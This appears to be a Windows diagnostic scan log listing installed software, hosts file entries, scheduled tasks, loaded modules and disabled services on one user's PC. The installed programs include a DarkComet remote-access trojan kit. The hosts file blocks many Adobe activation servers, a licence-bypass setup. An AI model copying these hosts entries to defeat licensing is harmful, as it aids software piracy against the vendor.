CCC Help Russian (x32 Version: 2013.0926.1628.27759 - Advanced Micro Devices, Inc.) Hidden
CCC Help Spanish (x32 Version: 2013.0926.1628.27759 - Advanced Micro Devices, Inc.) Hidden
CCC Help Swedish (x32 Version: 2013.0926.1628.27759 - Advanced Micro Devices, Inc.) Hidden
CCC Help Thai (x32 Version: 2013.0926.1628.27759 - Advanced Micro Devices, Inc.) Hidden
CCC Help Turkish (x32 Version: 2013.0926.1628.27759 - Advanced Micro Devices, Inc.) Hidden
ccc-utility64 (Version: 2013.0926.1629.27759 - Advanced Micro Devices, Inc.) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 4.04 - Piriform)
Cheat Engine 6.2 (HKLM-x32\...\Cheat Engine 6.2_is1) (Version: - Dark Byte)
Color Suite v11.0.4 (HKLM-x32\...\{99487911-8011-42BC-B594-8B02BFD32B1D}_is1) (Version: 11.0.4 - Red Giant, LLC)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version: - Valve)
Counter-Strike: Source (HKLM-x32\...\Counter-Strike: Source) (Version: - Valve)
Counter-Strike: Source (HKLM-x32\...\Steam App 240) (Version: - Valve)
CPUCooL (remove only) (HKLM-x32\...\CPUCooL) (Version: - )
CustoPackTools (HKLM\...\CustoPackTools) (Version: - neOceane)
CyberGhost 5 (HKLM\...\CyberGhost VPN 5_is1) (Version: - CyberGhost S.R.L.)
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.47.1.0333 - Disc Soft Ltd)
DarkComet RAT Legacy version 5.4 (HKLM-x32\...\DarkComet RAT Legacy_is1) (Version: 5.4 - Phrozen ® Software 2012.)
DarkComet RAT Module version 5.4 (HKLM-x32\...\DarkComet RAT Module_is1) (Version: 5.4 - Phrozen ® Software 2012.)
DarkComet RAT Remover version 1.0 (HKLM-x32\...\DarkComet RAT Remover_is1) (Version: 1.0 - Phrozen ® Software 2012.)
DivX-Setup (HKLM-x32\...\DivX Setup) (Version: 2.6.1.44 - DivX, LLC)
Dropbox (HKCU\...\Dropbox) (Version: 2.4.11 - Dropbox, Inc.)
Dxtory 2.0.104 (HKLM-x32\...\Dxtory2.0_is1) (Version: 2.0.104 - Dxtory Software)
eDgMt2 Client (HKLM-x32\...\eDgMt2 Client) (Version: 1.2.0.3 - eDg-Servers)
Etron USB3.0 Host Controller (HKLM-x32\...\InstallShield_{DFBB738C-71D8-4DC5-B8D2-D65C37680E27}) (Version: 0.115 - Etron Technology)
Etron USB3.0 Host Controller (x32 Version: 0.115 - Etron Technology) Hidden
Evrsoft First Page 2006 (HKLM-x32\...\Evrsoft First Page 2006_is1) (Version: - Evrsoft)
FileZilla Client 3.7.3 (HKLM-x32\...\FileZilla Client) (Version: 3.7.3 - Tim Kosse)
FormatFactory 3.0.1 (HKLM-x32\...\FormatFactory) (Version: 3.0.1 - Free Time)
Free YouTube Download version 3.2.2.430 (HKLM-x32\...\Free YouTube Download_is1) (Version: 3.2.2.430 - DVDVideoSoft Ltd.)
Free YouTube to MP3 Converter version 3.12.23.219 (HKLM-x32\...\Free YouTube to MP3 Converter_is1) (Version: 3.12.23.219 - DVDVideoSoft Ltd.)
Game Booster 3 (HKLM-x32\...\Game Booster_is1) (Version: 3.4 - IObit)
Gameforge Live 1.9.0 "Legend" (HKLM-x32\...\{9C98989A-3A15-42DA-A3B9-D20331437D67}}_is1) (Version: 1.9.0 - Gameforge)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 33.0.1750.146 - Google Inc.)
Google Update Helper (x32 Version: 1.3.22.5 - Google Inc.) Hidden
Google+ Auto Backup (HKLM-x32\...\{A50DE037-B5C0-4C8A-8049-B0C576B313D1}) (Version: 1.0.21.81 - Google)
GPU Temp version 1.0 (HKLM-x32\...\{8C8711FD-0FC8-4801-B33E-ED19BB0350B1}_is1) (Version: 1.0 - gputemp.com)
Grand Theft Auto IV (HKLM-x32\...\{579BA58C-F33D-4970-9953-B94B43768AC3}) (Version: 1.00.0000 - Rockstar Games)
Grand Theft Auto IV (x32 Version: 1.0.0013.131 - Rockstar Games Inc.) Hidden
Granny Viewer 2.9.1.0 (HKLM-x32\...\Granny Viewer_is1) (Version: 2.9.1.0 - RAD Game Tools, Inc.)
GTA IV Vehicle Mod Installer v1.2 (HKLM-x32\...\GTA IV Vehicle Mod Installer v1.2_is1) (Version: - MobileD2)
Gtk# for .Net 2.12.10 (HKLM-x32\...\{550B72C4-F404-4812-971F-947E835A877E}) (Version: 2.12.10 - Novell, Inc.)
H.264 Encoder (HKLM-x32\...\{B99459D2-B91A-417E-9DFA-F53D569F4445}_is1) (Version: - www.H264Encoder.com)
Haali Media Splitter (HKLM-x32\...\HaaliMkx) (Version: - )
HTC Driver Installer (HKLM-x32\...\{4CEEE5D0-F905-4688-B9F9-ECC710507796}) (Version: 4.10.0.001 - HTC Corporation)
HTC Sync Manager (HKLM-x32\...\{368E4EF8-E840-40EE-A224-50B8D1DC2B12}) (Version: 2.4.36.0 - HTC)
HxD Hex Editor Version 1.7.7.0 (HKLM-x32\...\HxD Hex Editor_is1) (Version: 1.7.7.0 - Maël Hörz)
IPTInstaller (HKLM-x32\...\{08208143-777D-4A06-BB54-71BF0AD1BB70}) (Version: 4.0.8 - HTC)
Java 7 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217025FF}) (Version: 7.0.250 - Oracle)
Java Auto Updater (x32 Version: 2.1.9.5 - Sun Microsystems, Inc.) Hidden
JPGVideo 1.05.0.0 (HKLM-x32\...\JPGVideo_is1) (Version: - NDW Ltd)
Kepard (HKLM-x32\...\Kepard) (Version: - Kepard)
KeyScrambler (HKLM-x32\...\KeyScrambler) (Version: 3.3.0.0 - QFX Software Corporation)
K-Lite Codec Pack 10.0.5 Full (HKLM-x32\...\KLiteCodecPack_is1) (Version: 10.0.5 - )
Lagarith Lossless Codec (1.3.27) (HKLM-x32\...\{F59AC46C-10C3-4023-882C-4212A92283B3}_is1) (Version: - )
Left 4 Dead 2 (HKLM-x32\...\Steam App 550) (Version: - Valve)
LibreOffice 4.1.4.2 (HKLM-x32\...\{94E11973-ED58-47A0-907C-ABF6D95C5DD8}) (Version: 4.1.4.2 - The Document Foundation)
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.173 - LogMeIn, Inc.)
LogMeIn Hamachi (x32 Version: 2.2.0.173 - LogMeIn, Inc.) Hidden
Magic Bullet Suite 64-bit (HKLM-x32\...\InstallShield_{7C419638-A20F-441A-8FE0-9D9724B1A793}) (Version: 11.4.3 - Red Giant Software)
Magic Bullet Suite 64-bit (Version: 11.4.3 - Red Giant Software) Hidden
Malwarebytes Anti-Malware Version 1.75.0.1300 (HKLM-x32\...\Malwarebytes' Anti-Malware_is1) (Version: 1.75.0.1300 - Malwarebytes Corporation)
Microsoft .NET Framework 4.5 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50709 - Microsoft Corporation)
Microsoft .NET Framework 4.5 (Version: 4.5.50709 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5 DEU Language Pack (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.5.50709 - Microsoft Corporation)
Microsoft .NET Framework 4.5 DEU Language Pack (Version: 4.5.50709 - Microsoft Corporation) Hidden
Microsoft Virtual PC 2007 (HKLM\...\{8A7CAA24-7B23-410B-A7C3-F994B0944160}) (Version: 6.0.156.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729 (HKLM\...\{14297226-E0A0-3781-8911-E9D529552663}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.51106 (HKLM-x32\...\{6e8f74e0-43bd-4dce-8477-6ff6828acc07}) (Version: 11.0.51106.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.51106 (Version: 11.0.51106 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.51106 (Version: 11.0.51106 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.50727 (x32 Version: 11.0.50727 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.50727 (x32 Version: 11.0.50727 - Microsoft Corporation) Hidden
Microsoft_VC80_CRT_x86 (x32 Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_MFC_x86 (x32 Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_MFCLOC_x86 (x32 Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC90_ATL_x86 (x32 Version: 1.00.0000 - Adobe) Hidden
Microsoft_VC90_CRT_x86 (x32 Version: 1.00.0000 - Adobe) Hidden
Microsoft_VC90_MFC_x86 (x32 Version: 1.00.0000 - Adobe) Hidden
Microsoft_VC90_MFCLOC_x86 (x32 Version: 1.00.0000 - Adobe) Hidden
Mozilla Firefox 27.0.1 (x86 de) (HKLM-x32\...\Mozilla Firefox 27.0.1 (x86 de)) (Version: 27.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 27.0.1 - Mozilla)
MSI Afterburner 2.3.1 (HKLM-x32\...\Afterburner) (Version: 2.3.1 - MSI Co., LTD)
MSVCRT Redists (Version: 1.0 - Sony Creative Software Inc.) Hidden
MSVCRT Redists (x32 Version: 1.0 - Sony Creative Software Inc.) Hidden
MultiSkypeLauncher (remove only) (HKLM-x32\...\MultiSkypeLauncher) (Version: 1.8 - MultiSkypeLauncher)
NewBlue Art Effects for Windows (HKLM-x32\...\NewBlue Art Effects for Windows) (Version: 2.4 - NewBlue)
NewBlue Film Effects for Windows (HKLM-x32\...\NewBlue Film Effects for Windows) (Version: 1.4 - NewBlue)
NewBlue Light Effects for Windows (HKLM-x32\...\NewBlue Light Effects for Windows) (Version: 1.4 - NewBlue)
NewBlue Motion Effects for Windows (HKLM-x32\...\NewBlue Motion Effects for Windows) (Version: 2.4 - NewBlue)
NewBlue Video Essentials for Windows (HKLM-x32\...\NewBlue Video Essentials for Windows) (Version: 1.4 - NewBlue)
NewBlue Video Essentials II for Windows (HKLM-x32\...\NewBlue Video Essentials II for Windows) (Version: 1.4 - NewBlue)
NewBlue Video Essentials III for Windows (HKLM-x32\...\NewBlue Video Essentials III for Windows) (Version: 1.4 - NewBlue)
NewBlue Video Essentials IV for Windows (HKLM-x32\...\NewBlue Video Essentials IV for Windows) (Version: 1.4 - NewBlue)
Nmap 6.40 (HKLM-x32\...\Nmap) (Version: - )
No-IP DUC (HKLM-x32\...\NoIPDUC) (Version: 4.0.1 - Vitalwerks Internet Solutions LLC)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.4.1 - Notepad++ Team)
NVIDIA Photoshop Plug-ins 64 bit (HKLM-x32\...\{5E386C5B-CDE7-435A-B5C9-EC73A1B0553A}) (Version: 8.50 - )
Oracle VM VirtualBox 4.2.12 (HKLM\...\{0C1DE303-E41B-44BA-8ABA-B7F09D857001}) (Version: 4.2.12 - Oracle Corporation)
Paint.NET v3.5.10 (HKLM\...\{529125EF-E3AC-4B74-97E6-F688A7C0F1C0}) (Version: 3.60.0 - dotPDN LLC)
PDF Settings CC (x32 Version: 12.0 - Adobe Systems Incorporated) Hidden
PDF Settings CS6 (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.)
PokIt (HKLM-x32\...\{FA309CFA-284A-437A-86AF-E55BA40CFC12}) (Version: 0.7.0 - Teo Eterovic)
PremiumSoft Navicat Premium 11.0 (HKLM-x32\...\PremiumSoft Navicat Premium_is1) (Version: 11.0.8 - PremiumSoft CyberTech Ltd.)
PremiumSoft Navicat Premium 8.2 (HKLM-x32\...\PremiumSoft Navicat Premium 8.2_is1) (Version: - PremiumSoft CyberTech Ltd.)
Python 2.2 (HKLM-x32\...\Python 2.2) (Version: 2.2 - PythonLabs at Zope Corporation)
QuickTime (HKLM-x32\...\{B67BAFBA-4C9F-48FA-9496-933E3B255044}) (Version: 7.74.80.86 - Apple Inc.)
Rainmeter (HKLM-x32\...\Rainmeter) (Version: 3.0 r2116 - )
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.49.927.2011 - Realtek)
Realtek Ethernet Diagnostic Utility (HKLM-x32\...\{DADC7AB0-E554-4705-9F6A-83EA82ED708E}) (Version: 1.006 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6873 - Realtek Semiconductor Corp.)
Red Giant Link (HKLM-x32\...\{10F82E5B-B611-4C65-8F29-666A9EC5680A}_is1) (Version: 1.7.26.0 - Red Giant, LLC)
Resource Hacker Version 3.6.0 (HKLM-x32\...\ResourceHacker_is1) (Version: - )
Revo Uninstaller 1.94 (HKLM-x32\...\Revo Uninstaller) (Version: 1.94 - VS Revo Group)
RouterControl 2.0 (HKLM-x32\...\RouterControl) (Version: - )
Sandboxie 4.06 (64-bit) (HKLM\...\Sandboxie) (Version: 4.06 - Sandboxie Holdings, LLC)
SHARKOON DarkGlider Gaming Mouse (HKLM-x32\...\{54FF1427-EFA5-4815-958F-246181E207DD}}_is1) (Version: - )
SkyCustomizer (HKCU\...\78f9834930bc44cf) (Version: 1.0.0.7 - JariZ.pro)
Skype™ 6.11 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.11.102 - Skype Technologies S.A.)
Steam (HKLM-x32\...\Steam) (Version: - Valve Corporation)
Tablet Driver With Macrokey Manager (HKLM\...\RmTablet) (Version: 4.13 - )
TAP-Windows 9.9.2 (HKLM\...\TAP-Windows) (Version: 9.9.2 - )
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.13.1 - TeamSpeak Systems GmbH)
TeamViewer 8 (HKLM-x32\...\TeamViewer 8) (Version: 8.0.18051 - TeamViewer)
Telegram Win (Unofficial) version 0.3.10 (HKCU\...\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1) (Version: 0.3.10 - Telegram (Unofficial))
Tor 0.2.3.25 (HKLM-x32\...\Tor) (Version: - )
Trapcode Suite 64-bit (HKLM-x32\...\InstallShield_{A27FDB06-60C8-4D5A-BB2F-8038FD151E3C}) (Version: 11.0.3 - Red Giant Software)
Trapcode Suite 64-bit (Version: 11.0.3 - Red Giant Software) Hidden
Ubisoft Game Launcher (HKLM-x32\...\{888F1505-C2B3-4FDE-835D-36353EBD4754}) (Version: 1.0.0.0 - UBISOFT)
VC80CRTRedist - 8.0.50727.6195 (x32 Version: 1.2.0 - DivX, Inc) Hidden
Vegas Pro 11.0 (HKLM-x32\...\{B644D34F-0296-11E2-938E-F04DA23A5C58}) (Version: 11.0.700 - Sony)
Vegas Pro 12.0 (64-bit) (HKLM\...\{7A0D09B0-6575-11E2-89D5-F04DA23A5C58}) (Version: 12.0.486 - Sony)
VersaVPN 1.1.2.0 (HKLM-x32\...\VersaVPN 1.1.2.0) (Version: - )
Vidalia 0.2.21 (HKLM-x32\...\Vidalia) (Version: - )
VLC media player 2.1.1 (HKLM\...\VLC media player) (Version: 2.1.1 - VideoLAN)
VMware Player (HKLM-x32\...\VMware_Player) (Version: 5.0.2 - VMware, Inc)
VMware Player (Version: 5.0.2 - VMware, Inc.) Hidden
WinDirStat 1.1.2 (HKCU\...\WinDirStat) (Version: - )
Windows Installer Clean Up (HKLM-x32\...\{121634B0-2F4B-11D3-ADA3-00C04F52DD52}) (Version: 3.00.00.0000 - Microsoft Corporation)
WinHTTrack Website Copier 3.47-27 (x64) (HKLM\...\WinHTTrack Website Copier_is1) (Version: 3.47.27 - HTTrack)
WinPcap 4.1.3 (HKLM-x32\...\WinPcapInst) (Version: 4.1.0.2980 - Riverbed Technology, Inc.)
WinRAR 4.20 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)
WinSCP 4.3.9 (HKLM-x32\...\winscp3_is1) (Version: 4.3.9 - Martin Prikryl)
Wireshark 1.10.2 (64-bit) (HKLM-x32\...\Wireshark) (Version: 1.10.2 - The Wireshark developer community, hxxp://www.wireshark.org)
World of Metin2 (HKLM-x32\...\World of Metin2) (Version: - )
x264vfw - H.264/MPEG-4 AVC codec for x64 (remove only) (HKLM-x32\...\x264vfw64) (Version: - )
XAMPP (HKLM-x32\...\xampp) (Version: 1.8.3-2 - BitNami)
Xvid Video Codec (HKLM-x32\...\Xvid Video Codec 1.3.2) (Version: 1.3.2 - Xvid Team)
==================== Restore Points =========================
12-02-2014 18:15:35 Geplanter Prüfpunkt
20-02-2014 13:31:07 Geplanter Prüfpunkt
23-02-2014 13:01:58 DirectX wurde installiert
03-03-2014 15:08:55 Geplanter Prüfpunkt
==================== Hosts content: ==========================
2013-05-07 19:15 - 2013-07-03 12:49 - 00001016 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 ood.opsource.net ereg.wip4.adobe.com ereg.wip.adobe.com activate-sjc0.adobe.com practivate.adobe.ipp activate.wip4.adobe.com 3dns-1.adobe.com activate.wip1.adobe.com 3dns.adobe.com
127.0.0.1 practivate.adobe.ntp activate.wip.adobe.com wip1.adobe.com 3dns-4.adobe.com activate.wip2.adobe.com practivate.adobe 3dns-2.adobe.com www.wip4.adobe.com 3dns-3.adobe.com
127.0.0.1 crl.verisign.net adobe-dns-4.adobe.com adobe-dns-1.adobe.com adobe-dns.adobe.com ereg.adobe.com wip4.adobe.com lm.licenses.adobe.com wip3.adobe.com na2m-pr.licenses.adobe.com
127.0.0.1 www.wip1.adobe.com adobeereg.com lmlicenses.wip4.adobe.com www.wip2.adobe.com ereg.wip2.adobe.com www.wip.adobe.com wip2.adobe.com practivate.adobe.newoa wwis-dubc1-vip60.adobe.com
127.0.0.1 wip.adobe.com adobe-dns-3.adobe.com www.adobeereg.com practivate.adobe.com activate-sea.adobe.com activate.wip3.adobe.com activate.adobe.com adobe-dns-2.adobe.com www.wip3.adobe.com
127.0.0.1 hl2rcv.adobe.com ereg.wip3.adobe.com ereg.wip1.adobe.com
==================== Scheduled Tasks (whitelisted) =============
Task: {59089B9A-AFD7-40B4-BAA1-73BE50C85878} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2013-11-18] (Adobe Systems Incorporated)
Task: {6E75937B-B779-4A60-BFF7-E9B906D015BC} - System32\Tasks\Microsoft\Windows\TabletPC\InputPersonalization => C:\Program Files\Common Files\Microsoft Shared\Ink\InputPersonalization.exe [2009-07-14] (Microsoft Corporation)
Task: {724AF600-4245-4733-9B4C-5EF54D7B05DB} - System32\Tasks\Game_Booster_AutoUpdate => C:\Program Files (x86)\IObit\Game Booster 3\AutoUpdate.exe [2013-06-09] ()
Task: {7EB5E51D-C3FD-4EE1-A3A9-F7490674C045} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-10-06] (Google Inc.)
Task: {A33A115D-CCBA-4806-BCF5-F3BD1B560D45} - System32\Tasks\AdobeAAMUpdater-1.0-AzeX-AweZome => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2013-12-10] (Adobe Systems Incorporated)
Task: {B8638749-62C0-4363-907F-62318BA361BA} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-10-06] (Google Inc.)
Task: {DF902195-6A69-4B23-93FE-5E32F6932473} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2013-07-22] (Piriform Ltd)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
==================== Loaded Modules (whitelisted) =============
2013-09-26 15:32 - 2013-09-26 15:32 - 00214528 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Container.PerformanceTuning.dll
2013-07-26 05:59 - 2013-07-26 05:59 - 00814592 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Device.dll
2013-07-26 05:59 - 2013-07-26 05:59 - 03650560 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Platform.dll
2014-02-11 03:21 - 2014-02-11 03:21 - 00644464 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll
2010-01-02 15:42 - 2010-01-02 15:42 - 00098304 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext_64.dll
2013-05-07 16:34 - 2013-05-07 16:34 - 00012520 _____ () C:\Users\AweZome\AppData\Local\Microsoft\Windows Sidebar\Gadgets\All_CPU_Meter_V4.6.gadget\CoreTempReader.dll
2013-05-07 16:34 - 2013-05-07 16:34 - 00015080 _____ () C:\Users\AweZome\AppData\Local\Microsoft\Windows Sidebar\Gadgets\All_CPU_Meter_V4.6.gadget\GetCoreTempInfoNET.dll
2013-05-07 16:34 - 2013-05-07 16:34 - 00014056 _____ () C:\Users\AweZome\AppData\Local\Microsoft\Windows Sidebar\Gadgets\All_CPU_Meter_V4.6.gadget\SystemInfo.dll
2014-02-14 13:54 - 2012-11-28 19:32 - 00295936 _____ () C:\Program Files (x86)\SHARKOON DarkGlider\hid.exe
2014-02-14 13:54 - 2012-02-10 12:19 - 00265216 _____ () C:\Program Files (x86)\SHARKOON DarkGlider\trayicon.exe
2014-01-26 11:55 - 2014-01-26 11:55 - 00821600 _____ () C:\Program Files (x86)\HTC\HTC Sync Manager\HTC Sync\adb.exe
2014-01-15 11:02 - 2014-01-15 11:02 - 04697456 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncV1\CoreSync.exe
2013-11-14 21:30 - 2013-11-14 21:30 - 00031080 _____ () C:\Program Files (x86)\HTC\HTC Sync Manager\DbAccess.dll
2014-01-26 11:54 - 2014-01-26 11:54 - 00607376 _____ () C:\Program Files (x86)\HTC\HTC Sync Manager\sqlite3.dll
2013-11-14 21:31 - 2013-11-14 21:31 - 00044392 _____ () C:\Program Files (x86)\HTC\HTC Sync Manager\NAdvLog.dll
2013-11-14 21:31 - 2013-11-14 21:31 - 00036216 _____ () C:\Program Files (x86)\HTC\HTC Sync Manager\NFileCacheDBAccess.dll
2013-11-14 21:31 - 2013-11-14 21:31 - 00080248 _____ () C:\Program Files (x86)\HTC\HTC Sync Manager\ninstallerhelper.dll
2013-11-14 21:33 - 2013-11-14 21:33 - 00129376 _____ () C:\Program Files (x86)\HTC\HTC Sync Manager\zlib1.dll
2013-11-14 21:34 - 2013-11-14 21:34 - 00223592 _____ () C:\Program Files (x86)\HTC\HTC Sync Manager\DevConnMon.dll
2014-02-14 13:54 - 2011-02-18 13:54 - 00061440 _____ () C:\Program Files (x86)\SHARKOON DarkGlider\HidDevice.dll
2014-02-14 13:54 - 2011-02-22 11:20 - 00042496 _____ () C:\Program Files (x86)\SHARKOON DarkGlider\keydll3.dll
2014-02-11 15:09 - 2014-02-11 15:09 - 32733080 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\HEX\libcef.dll
2013-08-07 20:25 - 2013-08-07 20:25 - 00093696 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext.dll
2014-02-14 13:54 - 2009-10-28 09:28 - 00249856 _____ () C:\Program Files (x86)\SHARKOON DarkGlider\language.dll
2013-10-01 14:53 - 2014-02-16 10:06 - 03578992 _____ () C:\Program Files (x86)\Mozilla Firefox\mozjs.dll
2014-02-11 15:09 - 2014-02-11 15:09 - 00742808 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\HEX\libglesv2.dll
2014-02-11 15:09 - 2014-02-11 15:09 - 00136600 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\HEX\libegl.dll
2013-11-18 08:28 - 2013-11-18 08:28 - 16237448 _____ () C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_9_900_152.dll
==================== Alternate Data Streams (whitelisted) =========
==================== Safe Mode (whitelisted) ===================
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"
==================== Disabled items from MSCONFIG ==============
MSCONFIG\Services: AcuWVSSchedulerv8 => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: AxInstSV => 3
MSCONFIG\Services: BDESVC => 3
MSCONFIG\Services: BstHdAndroidSvc => 2
MSCONFIG\Services: BstHdLogRotatorSvc => 2
MSCONFIG\Services: bthserv => 3
MSCONFIG\Services: CGVPNCliService => 2
MSCONFIG\Services: CGVPNCliSrvc => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: gusvc => 3
MSCONFIG\Services: HTCMonitorService => 2
MSCONFIG\Services: MBAMScheduler => 2
MSCONFIG\Services: MBAMService => 2
MSCONFIG\Services: MozillaMaintenance => 3
MSCONFIG\Services: PassThru Service => 2
MSCONFIG\Services: rpcapd => 3
MSCONFIG\Services: SbieSvc => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: SpyHunter 4 Service => 2
MSCONFIG\Services: Steam Client Service => 3
MSCONFIG\Services: SwitchBoard => 3
MSCONFIG\Services: TabletInputService => 3
MSCONFIG\Services: TapiSrv => 3
MSCONFIG\Services: TeamViewer8 => 2
MSCONFIG\Services: VMAuthdService => 2
MSCONFIG\Services: VMUSBArbService => 2
MSCONFIG\Services: WTService => 2
MSCONFIG\Services: wuauserv => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^PokIt.lnk => C:\Windows\pss\PokIt.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^AweZome^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Dropbox.lnk => C:\Windows\pss\Dropbox.lnk.Startup
MSCONFIG\startupfolder: C:^Users^AweZome^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^MultiSkypeLauncher.lnk => C:\Windows\pss\MultiSkypeLauncher.lnk.Startup
